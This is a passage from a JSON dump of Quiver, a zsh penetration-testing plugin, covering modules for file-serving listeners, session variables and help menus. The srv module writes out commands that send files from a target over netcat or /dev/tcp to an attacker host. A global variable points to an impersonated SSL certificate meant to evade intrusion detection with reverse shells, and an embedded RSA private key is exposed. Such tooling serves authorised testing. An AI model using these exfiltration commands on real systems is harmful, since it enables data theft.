    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-srv\n#############################################################\n\nqq-srv-help() {\n    cat << \"DOC\"\n\nqq-srv\n-------\nThe srv namespace provides commands for hosting local services\nsuch as web, ftp, smb and other services for data exfil or transfer.\n\nCommands\n--------\nqq-srv-install:          install dependencies\nqq-srv-web:              hosts a python3 web server in current dir\nqq-srv-ftp:              hosts a python3 ftp server in current dir\nqq-srv-smb:              hosts an impacket smb server in current dir\nqq-srv-tftp:             starts the atftpd service in /srv/tftp\nqq-srv-smtp:             hosts a python3 smtp server in current dir\nqq-srv-updog:            hosts an updog web server in current dir\nqq-srv-nc-tar:           hosts a netcat server > tar file in current dir\nqq-srv-nc-file:          hosts a netcat server > file in current dir\nqq-srv-web-hosted:       hosts a python3 web server in /srv, port as $1\nqq-srv-php-hosted:       hosts a php web server in /srv, port as $1\nqq-srv-ftp-hosted:       hosts a python3 ftp server in /srv\nqq-srv-updog-hosted:     hosts an updog web server in /srv\n\nDOC\n}\n\nqq-srv-install() {\n    __info \"Running $0...\"\n    __pkgs netcat atftpd \n    __pkgs php python3 python3-pip python3-smb python3-pyftpdlib impacket-scripts\n    sudo pip3 install updog\n}\n\nqq-srv-web() print -z \"sudo python3 -m http.server 80\"\nqq-srv-ftp() print -z \"sudo python3 -m pyftpdlib -p 21 -w\"\nqq-srv-smb() print -z \"sudo impacket-smbserver -smb2supp F .\"\nqq-srv-tftp() print -z \"sudo service atftpd start\"\nqq-srv-smtp() print -z \"sudo python3 -m smtpd -c DebuggingServer -n 0.0.0.0:25\"\n\nqq-srv-web-hosted() {\n    __info \"Serving content from /srv\"\n    if [ \"$#\" -eq  \"1\" ]\n    then\n        pushd /srv &> /dev/null\n        sudo python3 -m http.server $1\n        popd &> /dev/null\n    else\n     
   pushd /srv &> /dev/null\n        sudo python3 -m http.server 80\n        popd &> /dev/null\n    fi\n}\n\nqq-srv-php-hosted() {\n    __info \"Serving content from /srv\"\n    if [ \"$#\" -eq  \"1\" ]\n    then\n        pushd /srv &> /dev/null\n        sudo php -S 0.0.0.0:$1 \n        popd &> /dev/null\n    else\n        pushd /srv &> /dev/null\n        sudo php -S 0.0.0.0:80\n        popd &> /dev/null\n    fi\n}\n\nqq-srv-ftp-hosted() {\n    __info \"Serving content from /srv\"\n    pushd /srv &> /dev/null\n    sudo python3 -m pyftpdlib -p 21 -w\n    popd &> /dev/null\n}\n\nqq-srv-updog() {\n    # -p is the port; --password sets the access password (random, 10 chars)\n    print -z \"updog -p 443 --ssl --password $(__rand 10)\"\n}\n\nqq-srv-updog-hosted() {\n    __info \"Serving content from /srv\"\n    sudo updog -p 443 --ssl -d /srv\n}\n\nqq-srv-nc-tar() {\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    __cyan \"Use the command below on the target system: \"\n    echo \"tar cfv - /path/to/send | nc ${__LHOST} ${__LPORT}\"\n    print -z \"nc -nvlp ${__LPORT} | tar xfv -\"\n}\n\nqq-srv-nc-file() {\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    __cyan \"Use the command below on the target system: \"\n    echo \"cat FILE > /dev/tcp/${__LHOST}/${__LPORT}\"\n    print -z \"nc -nvlp ${__LPORT} -w 5 > incoming.txt\"  \n}\n\nqq-srv-nc-b64() {\n    qq-vars-set-lhost\n    qq-vars-set-lport\n    __cyan \"Use the command below on the target system: \"\n    echo \"openssl base64 -in FILE > /dev/tcp/${__LHOST}/${__LPORT}\"\n    print -z \"nc -nvlp ${__LPORT} -w 5 > incoming.b64 && openssl base64 -d -in incoming.b64 -out incoming.txt\"  \n}\n"
  },
  {
    "path": "modules/qq-vars-global.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-vars-global\n#############################################################\n\nqq-vars-global-help() {\n    cat << \"DOC\"\n\nqq-vars-global\n--------------\nThe vars global namespace manages environment variables used in other functions\nthat are saved between sessions.  Values are stored as files in the .quiver/globals\ndirectory and can contain sensitive information like API keys. These variables\nare used to supply arguments to commands in other modules.\n\nVariables\n---------\n__IMPACKET:       full path to the python3 impacket examples directory\n__EXT_PHP:        a list of file extensions used on PHP webservers\n__EXT_DOCS:       a list of common document file types\n__API_GITHUB:     your personal Github API key\n__RESOLVERS:      path to public resolvers file \n__NOTES:          path to the directory containing your markdown notes for qq-notes\n__MNU_UA:         path to the file containing user-agent strings\n__MNU_WORDLISTS:  path to the file containing a list of favorite wordlists\n__TCP_PORTS:      path to the file of favorite TCP ports\n__SHELL_SSL_CERT: path to the file of an impersonated SSL cert used for reverse shell IDS evasion\n__ALIASES:        path to the file containing aliases that will be sourced\n\nCommands\n--------\nqq-vars-global:            list all current global variable values\nqq-vars-global-set-*:      used to set and save each individual variable\n\nDOC\n}\n\nqq-vars-global() {\n    echo \"$(__cyan IMPACKET: ) ${__IMPACKET}\"\n    echo \"$(__cyan EXT_PHP: ) ${__EXT_PHP}\"\n    echo \"$(__cyan EXT_DOCS: ) ${__EXT_DOCS}\"\n    echo \"$(__cyan API_GITHUB: ) ${__API_GITHUB}\"\n    echo \"$(__cyan NOTES: ) ${__NOTES}\"\n    echo \"$(__cyan RESOLVERS: ) ${__RESOLVERS}\"\n    echo \"$(__cyan MNU_UA: ) ${__MNU_UA}\"\n    echo \"$(__cyan MNU_WORDLISTS: ) ${__MNU_WORDLISTS}\"\n    echo \"$(__cyan TCP_PORTS: ) ${__TCP_PORTS}\"\n    echo 
\"$(__cyan SHELL_SSL_CERT: ) ${__SHELL_SSL_CERT}\"\n    echo \"$(__cyan ALIASES: ) ${__ALIASES}\"\n}\n\n########## __IMPACKET\n\nexport __IMPACKET=$(cat ${__GLOBALS}/IMPACKET 2> /dev/null || echo \"/usr/share/doc/python3-impacket/examples/\")\n\nqq-vars-global-set-impacket() {\n    __ask \"Set the full path to the python3-impacket/examples directory.\"\n    __askpath __IMPACKET DIR /\n    echo \"${__IMPACKET}\" > ${__GLOBALS}/IMPACKET\n}\n\n__check-impacket() { [[ -z \"${__IMPACKET}\" ]] && qq-vars-global-set-impacket }\n\n########## __EXT_PHP\n\nexport __EXT_PHP=$(cat ${__GLOBALS}/EXT_PHP 2> /dev/null || echo \"php,phtml,pht,xml,inc,log,sql,cgi\")\n\nqq-vars-global-set-ext-php() {\n    __ask \"Enter a csv list of PHP server file extensions, ex: php,php3,pht\"\n    __askvar __EXT_PHP EXTENSIONS\n    echo \"${__EXT_PHP}\" > ${__GLOBALS}/EXT_PHP\n}\n\n__check-ext-php()  { [[ -z \"${__EXT_PHP}\" ]] && qq-vars-global-set-ext-php } \n\n########## __EXT_DOCS\n\n# read from the same file that qq-vars-global-set-ext-docs writes (EXT_DOCS)\nexport __EXT_DOCS=$(cat ${__GLOBALS}/EXT_DOCS 2> /dev/null || echo \"doc,docx,pdf,xls,xlsx,txt,rtf,odt,ppt,pptx,pps,xml\")\n\nqq-vars-global-set-ext-docs() {\n    __ask \"Enter a csv list of document file extensions, ex: doc,xls,ppt\"\n    __askvar __EXT_DOCS EXTENSIONS\n    echo \"${__EXT_DOCS}\" > ${__GLOBALS}/EXT_DOCS\n}\n\n__check-ext-docs()  { [[ -z \"${__EXT_DOCS}\" ]] && qq-vars-global-set-ext-docs } \n\n########## __API_GITHUB\n\nexport __API_GITHUB=\"$(cat ${__GLOBALS}/API_GITHUB 2> /dev/null)\"\n\nqq-vars-global-set-api-github() {\n    __ask \"Enter your github API key below.\"\n    __askvar __API_GITHUB API_GITHUB\n    echo \"${__API_GITHUB}\" > ${__GLOBALS}/API_GITHUB\n}\n\n__check-api-github()  { [[ -z \"${__API_GITHUB}\" ]] && qq-vars-global-set-api-github } \n\n########## __API_GOOGLE_DOMAINS\n\nexport __API_GOOGLE_DOMAINS=\"$(cat ${__GLOBALS}/API_GOOGLE_DOMAINS 2> /dev/null)\"\n\nqq-vars-global-set-api-google-domains() {\n    __ask \"Enter Google domains username and password for a dynamic DNS 
domain\"\n    local u && __askvar u USERNAME \n    local p && __askvar p PASSWORD\n    # base64 is an encoding, not encryption: the stored value is still a recoverable credential\n    __API_GOOGLE_DOMAINS=$(echo \"$u:$p\" | base64)\n    echo \"${__API_GOOGLE_DOMAINS}\" > ${__GLOBALS}/API_GOOGLE_DOMAINS\n}\n\n__check-api-github()  { [[ -z \"${__API_GITHUB}\" ]] && qq-vars-global-set-api-github } \n\n\n########## __RESOLVERS\n\nexport __RESOLVERS=$(cat ${__GLOBALS}/RESOLVERS 2> /dev/null || echo \"${__PAYLOADS}/resolvers.txt\")\n\nqq-vars-global-set-resolvers() {\n    __ask \"Set the full path to the file containing a list of resolvers.\"\n    __askpath __RESOLVERS FILE $HOME\n    echo \"${__RESOLVERS}\" > ${__GLOBALS}/RESOLVERS\n}\n\n__check-resolvers() { [[ -z \"${__RESOLVERS}\" ]] && qq-vars-global-set-resolvers }\n\n\n########## __NOTES\n\nexport __NOTES=\"$(cat ${__GLOBALS}/NOTES 2> /dev/null)\"\n\nqq-vars-global-set-notes() {\n    __ask \"Set the full path to the directory containing markdown notes.\"\n    __askpath __NOTES DIR $HOME\n    echo \"${__NOTES}\" > ${__GLOBALS}/NOTES\n}\n\n__check-notes() { [[ -z \"${__NOTES}\" ]] && qq-vars-global-set-notes }\n\n########## __MNU_UA\n\nexport __MNU_UA=\"$(cat ${__GLOBALS}/MNU_UA 2> /dev/null || echo \"${__PAYLOADS}/user-agents.txt\")\"\n\nqq-vars-global-set-mnu-ua() {\n    __ask \"Set the full path to the file containing a list of user agent strings\"\n    __askpath __MNU_UA FILE $HOME\n    echo \"${__MNU_UA}\" > ${__GLOBALS}/MNU_UA\n}\n\n########## __MNU_WORDLISTS\n\nexport __MNU_WORDLISTS=\"$(cat ${__GLOBALS}/MNU_WORDLISTS 2> /dev/null || echo \"${__PAYLOADS}/wordlists.txt\")\"\n\nqq-vars-global-set-mnu-wordlists() {\n    __ask \"Set the full path to the file containing a list of favorite wordlists\"\n    __askpath __MNU_WORDLISTS FILE $HOME\n    echo \"${__MNU_WORDLISTS}\" > ${__GLOBALS}/MNU_WORDLISTS\n}\n\n########## __TCP_PORTS\n\nexport __TCP_PORTS=\"$(cat ${__GLOBALS}/TCP_PORTS 2> /dev/null || echo \"${__PAYLOADS}/tcp-ports.txt\")\"\n\nqq-vars-global-set-tcp-ports() {\n    __ask \"Set the full 
path to the file containing a list of favorite TCP ports\"\n    __askpath __TCP_PORTS FILE $HOME\n    echo \"${__TCP_PORTS}\" > ${__GLOBALS}/TCP_PORTS\n}\n\n########## __SHELL_SSL_CERT\n\nexport __SHELL_SSL_CERT=\"$(cat ${__GLOBALS}/SHELL_SSL_CERT 2> /dev/null || echo \"${__PAYLOADS}/aka.ms.pem\")\"\n\nqq-vars-global-set-shell-ssl-cert() {\n    __ask \"Set the full path to an impersonated SSL certificate in PEM format to use with reverse shells\"\n    __askpath __SHELL_SSL_CERT FILE $HOME\n    echo \"${__SHELL_SSL_CERT}\" > ${__GLOBALS}/SHELL_SSL_CERT\n}\n\n########## __ALIASES\n\nexport __ALIASES=\"$(cat ${__GLOBALS}/ALIASES 2> /dev/null || echo \"${__PAYLOADS}/aliases.rc\")\"\n\nqq-vars-global-set-aliases() {\n    __ask \"Set the full path to a file containing shell aliases\"\n    __askpath __ALIASES FILE $HOME\n    echo \"${__ALIASES}\" > ${__GLOBALS}/ALIASES\n}\n"
  },
  {
    "path": "modules/qq-vars.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq-vars\n#############################################################\n\nqq-vars-help() {\n  cat << \"DOC\"\n\nqq-vars\n-------\nThe vars namespace manages environment variables used in other functions. These\nvariables are set per session, but can be saved with qq-vars-save and reloaded\nwith qq-vars-load. The values are stored as files in .quiver/vars.\n\nThe menu options for some of the variables can be set using qq-vars-global, such\nas the list of favorite user-agents or wordlists (qq-vars-global-help).\n\nVariables\n---------\n__PROJECT:     the root directory used for all output, ex: /projects/example\n__LOGBOOK:     the logbook.md markdown file used in qq-log commands \n__IFACE:       the interface to use for commands, ex: eth0\n__DOMAIN:      the domain to use for commands, ex: example.org\n__NETWORK:     the subnet to use for commands, ex: 10.1.2.0/24\n__RHOST:       the remote host or target, ex: 10.1.2.3, example: target.example.org\n__RPORT:       the remote port; ex: 80\n__LHOST:       the accessible local IP address, ex: 10.1.2.3\n__LPORT:       the accessible local PORT, ex: 4444\n__URL:         a target URL, example: https://target.example.org\n__UA:          the user agent to use for commands, ex: googlebot\n__WORDLIST:    path to a wordlist file, ex: /usr/share/wordlists/example.txt\n__PASSLIST:    path to a wordlist for password brute forcing, ex: /usr/share/wordlists/rockyou.txt\n\nCommands\n--------\nqq-vars:           alias qv, list all current variable values\nqq-vars-save:      alias qvs, save all current variable values ($HOME/.quiver)\nqq-vars-load:      alias qvl, restores all current variable values ($HOME/.quiver)\nqq-vars-clear:     clears all current variable values\nqq-vars-set-*:     used to set each individual variable\n\nDOC\n}\n\nqq-vars() {\n  echo \"$(__cyan __PROJECT: ) ${__PROJECT}\"\n  echo \"$(__cyan __LOGBOOK: ) 
${__LOGBOOK}\"\n  echo \"$(__cyan __IFACE: ) ${__IFACE}\"\n  echo \"$(__cyan __DOMAIN: ) ${__DOMAIN}\"\n  echo \"$(__cyan __NETWORK: ) ${__NETWORK}\"\n  echo \"$(__cyan __RHOST: ) ${__RHOST}\"\n  echo \"$(__cyan __RPORT: ) ${__RPORT}\"\n  echo \"$(__cyan __LHOST: ) ${__LHOST}\"\n  echo \"$(__cyan __LPORT: ) ${__LPORT}\"\n  echo \"$(__cyan __URL: ) ${__URL}\"\n  echo \"$(__cyan __UA: ) ${__UA}\"\n  echo \"$(__cyan __WORDLIST: ) ${__WORDLIST}\"\n  echo \"$(__cyan __PASSLIST: ) ${__PASSLIST}\"\n}\nalias qv=\"qq-vars\"\n\nqq-vars-clear() {\n  __PROJECT=\"\"\n  __LOGBOOK=\"\"\n  __IFACE=\"\"\n  __DOMAIN=\"\"\n  __NETWORK=\"\"\n  __RHOST=\"\"\n  __RPORT=\"\"\n  __LHOST=\"\"\n  __LPORT=\"\"\n  __URL=\"\"\n  __UA=\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36\"\n  __WORDLIST=\"\"\n  __PASSLIST=\"\"\n}\n\nqq-vars-save() {\n  echo \"${__PROJECT}\" > $__VARS/PROJECT\n  echo \"${__LOGBOOK}\" > $__VARS/LOGBOOK\n  echo \"${__IFACE}\" > $__VARS/IFACE\n  echo \"${__DOMAIN}\" > $__VARS/DOMAIN\n  echo \"${__NETWORK}\" > $__VARS/NETWORK\n  echo \"${__RHOST}\" > $__VARS/RHOST\n  echo \"${__RPORT}\" > $__VARS/RPORT\n  echo \"${__LHOST}\" > $__VARS/LHOST\n  echo \"${__LPORT}\" > $__VARS/LPORT\n  echo \"${__URL}\" > $__VARS/URL\n  echo \"${__UA}\" > $__VARS/UA\n  echo \"${__WORDLIST}\" > $__VARS/WORDLIST\n  echo \"${__PASSLIST}\" > $__VARS/PASSLIST\n  qq-vars\n}\nalias qvs=\"qq-vars-save\"\n\nqq-vars-load() {\n    __PROJECT=$(cat $__VARS/PROJECT) \n    __LOGBOOK=$(cat $__VARS/LOGBOOK)\n    __IFACE=$(cat $__VARS/IFACE)\n    __DOMAIN=$(cat $__VARS/DOMAIN)\n    __NETWORK=$(cat $__VARS/NETWORK)\n    __RHOST=$(cat $__VARS/RHOST)\n    __RPORT=$(cat $__VARS/RPORT)\n    __LHOST=$(cat $__VARS/LHOST)\n    __LPORT=$(cat $__VARS/LPORT)\n    __URL=$(cat $__VARS/URL)\n    __UA=$(cat $__VARS/UA)\n    __WORDLIST=$(cat $__VARS/WORDLIST)\n    __PASSLIST=$(cat $__VARS/PASSLIST)\n    qq-vars\n}\nalias qvl=\"qq-vars-load\"\n\n\n########## 
__PROJECT\n\nexport __PROJECT=\"\"\n\nqq-vars-set-project() {\n  __ask \"Set the full path to the project root directory where all command output will be directed\"\n  \n  local d && __askpath d \"PROJECT DIR\" ${__PROJECT}\n  [[ \"$d\" == \"~\"* ]] && __err \"~ not allowed, use the full path\" && return\n\n  __PROJECT=$d\n  mkdir -p ${__PROJECT}\n  \n}\n\n__check-project() { [[ -z \"${__PROJECT}\" ]] && qq-vars-set-project }\n\n########## __LOGBOOK\n\nexport __LOGBOOK=\"\"\n\nqq-vars-set-logbook() {\n  __ask \"Set the full path to the directory of the logbook file (filename not included).\"\n  \n  local d && __askpath d \"DIR\" $HOME\n  [[ \"$d\" == \"~\"* ]] && __err \"~ not allowed, use the full path\" && return\n\n  mkdir -p $d\n\n  __LOGBOOK=\"${d}/logbook.md\"\n  \n  if [[ -f \"${__LOGBOOK}\" ]]; then\n      __warn \"${__LOGBOOK} already exists, set as active log\"\n  else\n      touch ${__LOGBOOK}\n      echo \"# Logbook\" >> ${__LOGBOOK}\n      echo \" \" >> ${__LOGBOOK}\n      __ok \"${__LOGBOOK} created.\"\n  fi\n}\n\n__check-logbook() { [[ -z \"${__LOGBOOK}\" ]] && qq-vars-set-logbook }\n\n########## __IFACE\n\nexport __IFACE=\"\"\n\nqq-vars-set-iface() {\n  if [[ -z \"${__IFACE}\" ]]\n  then\n    __ask \"Choose an interface: \"\n    __IFACE=$(__menu $(ip addr list | awk -F': ' '/^[0-9]/ {print $2}')) \n  else\n    __prefill __IFACE IFACE ${__IFACE}\n  fi\n\n}\n\n__check-iface() { [[ -z \"${__IFACE}\" ]] && qq-vars-set-iface }\n\n########## __DOMAIN\n\nexport __DOMAIN=\"\"\n\nqq-vars-set-domain() { __prefill __DOMAIN DOMAIN ${__DOMAIN} }\n\n__check-domain() { [[ -z \"${__DOMAIN}\" ]] && qq-vars-set-domain }\n\n\n########## __NETWORK\n\nexport __NETWORK=\"\"\n\nqq-vars-set-network() { __prefill __NETWORK NETWORK ${__NETWORK} }\n\n__check-network() { [[ -z \"${__NETWORK}\" ]] && qq-vars-set-network }\n\n########## __RHOST\n\nexport __RHOST=\"\"\n\nqq-vars-set-rhost() { __prefill __RHOST RHOST ${__RHOST} }\n\n########## __RPORT\n\nexport 
__RPORT=\"\"\n\nqq-vars-set-rport() { __prefill __RPORT RPORT ${__RPORT} }\n\n########## __LHOST\n\nexport __LHOST=\"\"\n\nqq-vars-set-lhost() {\n  if [[ -z $__LHOST ]]\n  then\n    __ask \"Choose a local IP address: \" \n    __LHOST=$(__menu $(ip addr list | grep -e \"inet \" | cut -d' ' -f6 | cut -d'/' -f1))\n  else\n    __prefill __LHOST LHOST ${__LHOST}\n  fi\n}\n\n########## __LPORT\n\nexport __LPORT=\"\"\n\nqq-vars-set-lport() { __prefill __LPORT LPORT ${__LPORT} }\n\n\n########## __URL\n\nexport __URL=\"\"\n\nqq-vars-set-url() { \n  local u && __prefill u URL ${__URL}\n  __URL=$(echo ${u} | sed 's/\\/$//')\n}\n\n########## __UA\n\nexport __UA=\"Mozilla/5.0\"\n\nqq-vars-set-ua() {\n  local IFS=$'\\n'\n  __ask \"Choose a user agent: \" \n  __UA=$(__menu $(cat  ${__MNU_UA}))\n}\n\n__check-ua() { [[ -z \"${__UA}\" ]] && qq-vars-set-ua }\n\n########## __WORDLIST\n\nexport __WORDLIST=\"\"\n\nqq-vars-set-wordlist() {\n  if [[ -z $__WORDLIST ]]\n  then\n    __ask \"Choose a wordlist: \"\n    __WORDLIST=$(__menu $(cat  ${__MNU_WORDLISTS}))\n  else\n\n    __prefill __WORDLIST WORDLIST ${__WORDLIST}\n  fi\n}\n\nqq-vars-set-wordlist-web() {\n  __ask \"Choose a wordlist: \"\n  __WORDLIST=$(__menu $(find  /usr/share/seclists/Discovery/Web-Content | sort))\n}\n\nqq-vars-set-wordlist-dns() {\n  __ask \"Choose a wordlist: \"\n  __WORDLIST=$(__menu $(find  /usr/share/seclists/Discovery/DNS | sort))\n}\n\n########## __PASSLIST\n\nexport __PASSLIST=\"/usr/share/wordlists/rockyou.txt\"\n\nqq-vars-set-passlist() {\n  __ask \"Choose a passlist: \"\n  __PASSLIST=$(__menu $(find  /usr/share/seclists/Passwords | sort))\n}\n\n\n# helpers\n\nexport __THREADS\n__check-threads() { __askvar __THREADS THREADS }\n\nexport __USER\n__check-user() { __askvar __USER USER }\n\nexport __SHARE\n__check-share() { __askvar __SHARE SHARE }\n\nexport __ORG\n__check-org() { __askvar __ORG ORG }\n\nexport __ASN\n__check-asn() { __askvar __ASN ASN }\n\n\n__netpath() { \n    __check-project\n    
local net=$(echo ${__NETWORK} | cut -d'/' -f1)\n    local result=${__PROJECT}/networks/${net}\n    mkdir -p \"${result}\"\n    echo  \"${result}\"\n}\n\n__hostpath() { \n    __check-project\n    local result=${__PROJECT}/hosts/${__RHOST}\n    mkdir -p \"${result}\"\n    echo  \"${result}\"\n}\n\n__urlpath() { \n    __check-project\n    local host=$(echo ${__URL} | cut -d'/' -f3)\n    local result=${__PROJECT}/hosts/${host}\n    mkdir -p \"${result}\"\n    echo  \"${result}\"\n}\n\n__dompath() { \n    __check-project\n    local result=${__PROJECT}/domains/${__DOMAIN}\n    mkdir -p \"${result}\"\n    echo  \"${result}\"\n}\n\n"
  },
  {
    "path": "modules/qq.zsh",
    "content": "#!/usr/bin/env zsh\n\n############################################################# \n# qq\n#############################################################\n\nqq-help() {\n    cat << \"DOC\"\n\nqq\n--\nThe qq namespace is the root of all other namespaces that can be access with tab-completion.\nTo get started, explore the qq-<namespace>-help commands. Install dependencies per namespace,\nusing the qq-<namespace>-install commands or install all dependencies using qq-install-all.\n\nVariables\n---------\n__VERSION     Current version of the Quiver plugin\n__PLUGIN      Full path to the Quiver oh-my-zsh plugin directory\n\nCommands\n--------\nqq-update:        git pull the latest (MASTER branch) version of Quiver\nqq-status:        check the current status of the locally cloned Quiver repository\nqq-whatsnew:      display the latest release notes\nqq-debug:         display the local diagnostic log\n\nNamespaces\n----------\nQuiver is organized in a tree of namespaces that are accessible via \"qq-\" with tab completion and search.\nEach namespace has its own install and help commands.\n\n Install and Configuration\n -------------------------\n qq-install-                    Installers for commonly used applications and global installer for all dependencies\n qq-notes-                      Configure and read your markdown notes\n qq-vars-global-                Persistent environment variables used in all commands, all sessions\n\n Utility\n ---------\n qq-encoding-                   Used for encoding / decoding data\n qq-kali-                       Variety of commands for managing Kali linux\n\n Engagement / Project / Bounty\n -----------------------------\n qq-log-                        Configure and setup a logbook for current engagement\n qq-vars-                       Per-session, per-engagement variables used in all commands\n qq-project-                    Commands to define scope and manage project data\n qq-project-custom-             Commands for 
custom project directory scaffolding\n\n Recon Phase\n -----------\n qq-recon-org-                  Recon commands for organization files and data\n qq-recon-github-               Recon commands for searching github repositories\n qq-recon-networks-             Recon commands for identifying an organization's networks\n qq-recon-domains-              Recon commands for horizontal domain enumeration\n qq-recon-subs-                 Recon commands for vertical sub-domain enumeration \n\n Active Enumeration Phase\n ------------------------\n qq-enum-network-               Enumerate and scan networks\n qq-enum-host-                  Enumerate and scan an individual host\n qq-enum-dhcp-                  Enumerate DHCP services\n qq-enum-dns-                   Enumerate DNS services\n qq-enum-ftp-                   Enumerate FTP services\n qq-enum-kerb-                  Enumerate Kerberos services\n qq-enum-ldap-                  Enumerate LDAP and Active Directory services\n qq-enum-mssql-                 Enumerate MSSQL database services\n qq-enum-mysql-                 Enumerate MYSQL database services\n qq-enum-nfs-                   Enumerate NFS shares and services\n qq-enum-oracle-                Enumerate Oracle database services\n qq-enum-pop3-                  Enumerate POP3 services\n qq-enum-rdp-                   Enumerate RDP services\n qq-enum-smb-                   Enumerate SMB services\n qq-enum-web-                   Enumerate web servers and services\n qq-enum-web-aws-               Enumerate AWS hosted services\n qq-enum-web-dirs-              Enumerate directories and files\n qq-enum-web-elastic-           Enumerate elastic search services\n qq-enum-web-fuzz-              Fuzz inputs such as forms, cookies and headers\n qq-enum-web-js-                Mine javascript files for secrets\n qq-enum-web-php-               Enumerate php web servers\n qq-enum-web-ssl-               Enumerate SSL certs and services\n qq-enum-web-vuln-              Check for 
common web vulnerabilities\n qq-enum-web-xss-               XSS helpers\n\n Exploitation Phase\n ------------------\n qq-srv-                        Commands for spawning file hosting services\n qq-exploit-                    Commands for compiling exploits\n qq-shell-tty-                  Commands for upgrading shells to tty\n qq-shell-handlers-             Commands for spawning reverse shell handlers\n qq-shell-handlers-msf-         Commands for spawning reverse shells with Metasploit\n  \n Post-Exploitation Phase\n -----------------------\n qq-pivot-                      Commands for pivoting with ssh\n\nDOC\n}\n\nqq-update() {\n    cd $HOME/.oh-my-zsh/custom/plugins/quiver\n    git pull\n    rm $__REMOTE_VER\n    rm $__REMOTE_CHK\n    cd - > /dev/null\n    source $HOME/.zshrc\n}\n\nqq-status() {\n    cd $HOME/.oh-my-zsh/custom/plugins/quiver\n    git status | grep On | cut -d\" \" -f2,3\n    cd - > /dev/null\n}\n\nqq-whatsnew() {\n    cat $__PLUGIN/RELEASES.md\n}\n\nqq-debug() {\n    cat ${__LOGFILE}\n}\n\n##### Output Helpers\n\n__cyan() echo \"$fg[cyan]$@ $reset_color\"\n__green() echo \"$fg[green]$@ $reset_color\"\n__blue() echo \"$fg[blue]$@ $reset_color\"\n__yellow() echo \"$fg[yellow]$@ $reset_color\"\n__red() echo \"$fg[red]$@ $reset_color\"\n\n__info() __blue \"[*] $@\"\n__ok() __green \"[+] $@\"\n__warn() __yellow \"[!] $@\"\n__err() __red \"[X] $@\"\n\n##### Input Helpers\n\n__ask() __yellow \"$@\"\n__prompt() __cyan \"[?] 
$@\"\n\n__askvar() { \n    local retval=$1\n    local question=$2\n    local tmpval\n    read \"tmpval?$fg[cyan]${question}:$reset_color \"\n    eval $retval=\"'$tmpval'\"\n}\n\n__askpath() { \n    local retval=$1\n    local question=$2\n    local prefill=$3\n    local tmpinput=$(rlwrap -S \"$fg[cyan]${question}: $reset_color\" -P \"${prefill}\" -e '' -c -o cat)\n    local tmpval=$(echo \"${tmpinput}\" | sed 's/\\/$//' )\n    eval $retval=\"'$tmpval'\"\n}\n\n__prefill() { \n    local retval=$1\n    local question=$2\n    local prefill=$3\n    local tmpval=$(rlwrap -S \"$fg[cyan]${question}: $reset_color\" -P \"${prefill}\" -e '' -o cat)\n    eval $retval=\"'$tmpval'\"\n}\n\n__check-proceed() {\n    PS3=\"$fg[cyan]Select: $reset_color\"\n    COLUMNS=10\n    select yn in \"Yes\" \"Cancel\"; do\n    case $yn in\n        Yes) \n            return 0\n            break;;\n        *)\n            return 1\n            break;;\n    esac\n    done\n}\n\n__menu() {\n    PS3=\"$fg[cyan]Select: $reset_color\"\n    COLUMNS=10\n    select o in $@; do break; done\n    echo ${o}\n}\n\n##### String Helpers\n\n__trim-slash() { echo $1 | sed 's/\\/$//' }\n__trim-quotes() { echo $1 | tr -d \\\" }\n__trim-newline() { echo $1 | tr -d \"\\n\"}\n\n__rand() {\n    if [ \"$#\" -eq  \"1\" ]\n    then\n        head /dev/urandom | tr -dc A-Za-z0-9 | head -c $1 ; echo ''\n    else\n        head /dev/urandom | tr -dc A-Za-z0-9 | head -c 16 ; echo ''\n    fi  \n}\n\n##### Tool Helpers\n\n__msf() {\n    local msfcmd=$(cat $@)\n    print -z \"msfconsole -n -q -x \\\"${msfcmd}\\\" \"\n}"
  },
  {
    "path": "payloads/aka.ms.pem",
    "content": "-----BEGIN RSA PRIVATE KEY-----\nMIICXAIBAAKBgQC2E+hNdtXUWpcB4qJz+afQmZNUB7V6gFViEejmU9SXuOirAVLl\nQ1cz2xwkyCb+xyGpEC51O4Hxb9bXEyV9JtJFjAlbehEkj+jFRIqEAXEd1UliFuRa\ngx4rwv0SpQWr3zu/jS5m+JdKnxdNISMFUR2G9bf8wcnNqhbtr6ByFyjsPQIDAQAB\nAoGBAIXWGkKeoEzojelf2sPe9kC6MnZo+Dfkj154BbcQVct0qunQHkvRdQ7z9zr+\nONO8MfzgnRWlOT3sVIJhW4Qj/hjNkIVpoGzRIpcGoW3L0XunJ1q6VaS+ESQUx0pY\njuyNmRYRaxSYrRzPolDqhX11fNM1Cswm5rrb2msvBBf7q/yNAkEA2Ub6za/tScaQ\n+xiLnmGwHSH9w0mKIm/XAuDFm1kOuId9xKOiwK5/7gLuan+rxSxc0FhoMYsB7nsN\nzgzJywasMwJBANaG/eXdNZYdfAGCkcpCmgUxiYx6/gRy3VX+uhMvaqBihBoGChiJ\nNVUs6ybyIJbh52fphPvfv2f6aIW5myFOlc8CQDTdymSFq8zJnbkazc3povpTrPT5\nTbz3TW+L1UjpMGXBwd44mn8bdlEpMW2ERv0gwCyJdkCnu/6UvlUmU2ss4nUCQAnn\nvb1pU1oVDm67aqPeI2JuAR3dZ/EopJOd6VWNcOzq35KcCMdNPosqQclQkLSmxZqE\nq8E9eYcBhuX1xfXpvP0CQBYNy279VufEzjkyjtv7Gc+6LjNoEcYOXQjffMN0gpwN\n+uc9FlSagHHs9hKLQk/4vIEeTqz008pwtF0XLy1dtdU=\n-----END RSA PRIVATE KEY-----\n-----BEGIN 